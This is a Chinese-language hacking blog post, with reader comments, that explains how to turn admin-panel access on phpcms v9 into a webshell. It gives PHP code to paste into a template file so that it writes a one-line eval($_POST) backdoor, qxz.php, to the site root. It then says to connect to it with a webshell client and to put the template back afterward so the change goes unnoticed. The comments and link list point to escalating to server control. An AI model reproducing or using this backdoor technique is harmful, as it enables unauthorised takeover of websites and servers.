记一次phpcms v9后台拿shell过程

作者:qxz_xp   发布:2013-11-17 16:52   分类:菜鸟入门, 黑客技术, 黑客攻防   3条评论  

记一次phpcms v9后台拿shell过程

登录进入后台管理后,点击界面,模板风格,然后点击祥细列表,如下图:

phpcmsV9

然后点击 search 这个文件夹,如下图:

phpcms

然后点击修改 index.html 文件

然后把以下代码复制上去提交。

<?

$fp = @fopen(“qxz.php”, ‘a’);

@fwrite($fp, ‘<‘.’?php’.”\r\n\r\n”.’eval($_POST[hacker])’.”\r\n\r\n?”.”>\r\n”);

@fclose($fp);

?>

提示:修改前先把原来的代码备份一下,拿到shell后把他改回去。

1259

提交后点击可视化一下

131117163330

这样在网站的根目录就生成了你的一句话木马客户端 qxz.php

拿起菜刀链接 http://www.xxx.com/qxz.php

0131117164105

 

原创文章转载请注明:转载自 七行者博客

本文固定链接: https://www.qxzxp.com/3945.html

QQ空间 微信 腾讯微博 新浪微博 我的搜狐 人人网 天涯社区 百度贴吧 更多
【上一篇】
【下一篇】

您可能还会对这些文章感兴趣!

  1. 带你了解后渗透工具Koadic(5)
  2. 揭露全自动化黑产 自动批量SHELL一条龙工具(1)
  3. 利用phpmyadmin执行语句拿webshell(1)
  4. 分享上传图片shell的绕过过滤的几种方法
  5. 后台拿webshell常用技巧总汇
  6. 入侵网站webshell提权服务器20种思路
  7. 谈谈WordPress程序的入侵思路和防御
  8. 另类突破数据库备份过滤拿shell
  9. phpcms v9前台上传头像getshell
  10. phpweb后台拿shell简单方法(4)
  11. 服务器提权之webshell提权总结(1)
  12. 入侵网站时的十种小经验
  13. 未成年“黑客”非法入侵部门官网被处罚5000元
  14. FCK突破建立文件夹后台拿shell(1)
  15. aspcms后台拿shell的两种方法
  16. 良精南方后台简单拿shell(6)

记一次phpcms v9后台拿shell过程:目前有3 条留言

  1. 0楼
    chen123:

    我都进后台了,这拿shell有什么意义

    2018-11-16 11:20 [回复]
    • qxz_xp:

      shell的权限比后台的权限大多了,拿shell后可以提权服务器的

      2018-11-19 15:15 [回复]
  2. 0楼
    啊勇:

    我很喜欢这方面技术,但是我不会 求大神能带带我吗

    2013-11-24 11:10 [回复]

发表评论

8 + 4 =

快捷键:Ctrl+Enter